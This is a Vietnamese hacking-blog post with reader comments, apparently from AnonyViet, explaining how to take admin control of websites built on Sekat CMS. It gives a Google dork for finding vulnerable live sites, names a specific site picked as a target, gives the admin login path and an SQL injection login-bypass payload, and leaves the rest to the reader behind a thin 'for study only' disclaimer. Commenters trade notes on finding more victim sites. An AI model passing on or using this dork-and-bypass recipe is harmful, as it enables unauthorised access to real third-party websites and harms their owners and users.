Sekat CMS hiện đang bị lỗ hổng SQL Injection, chỉ với một vài thủ thuật nhỏ, bạn có thể truy cập vào quyền quản trị Admin của Website, mà không cần phải tốn nhiều thời gian để khai thác.
| Tham gia kênh Telegram của AnonyViet 👉 Link 👈 |
Mình đi thẳng vào vấn đề luôn nhé
Bước 1: Tìm các Website sử dụng Sket CMS bằng Google
Nhập lệnh tìm kiếm dưới đây vào Google Search
intext:"Developed by Sekat Technologies" -site:https://cxsecurity.com
Bước 2: Chọn bất kỳ 1 Website được liệt kê trong Google
Mình sẽ chọn trang: http://unstccs.com để Test
Bước 3: Truy cập vào Weblogin Admin bằng Link dưới
http://tênwebiste.com/member_login.php
Cụ thể sẽ là:
Bước 4: Khai thác lỗi đăng nhập bằng điền User và Pass như bên dưới:
Username: '=' 'or' Password: '=' 'or'
Bước 5: Truy cập được vào quyền Admin, việc tiếp theo là của các bạn
Chỉ nên dùng để học tập, đừng phá người khác nhé
oke cảm ơn ad bài viết rất hữu ích
bài viết này hay mà 🙂
Like cho cmt này
bây giờ có mỗi 1 , 2 trang web thôi 🙁
Mình tìm thấy nhiều web lắm không phải mỗi 1 2 trang đâu
Tìm nữa đi bạn
ít ra cũng có web để thực hành , thank ad
Review trên anonyviet xem sao ^^
Xem lại trên trang thử đi bạn
Cảm ơn ad nhiều
Cảm ơn ad bài viết rất hữu ít
hữu cmn ích